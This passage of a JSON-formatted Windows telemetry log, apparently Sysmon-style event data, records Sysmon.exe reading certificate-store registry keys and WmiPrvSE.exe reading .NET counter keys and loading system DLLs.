"{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573454330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Data\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": 
"C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET CLR Networking 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "netfxperf.dll", - "image_path": "C:\\Windows\\System32\\netfxperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\.NET Memory Cache 4.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\MSDTC Bridge 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573455890000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\SMSvcHost 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 4292, - "process_name": "wmiprvse.exe", - "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Windows Workflow Foundation 4.0.0.0\\Linkage", - "registry_value": "Linkage", - "timestamp": 131883573455890000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "image_load", - "image_name": "wtsapi32.dll", - "image_path": "C:\\Windows\\System32\\wtsapi32.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573456050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573456050000, - 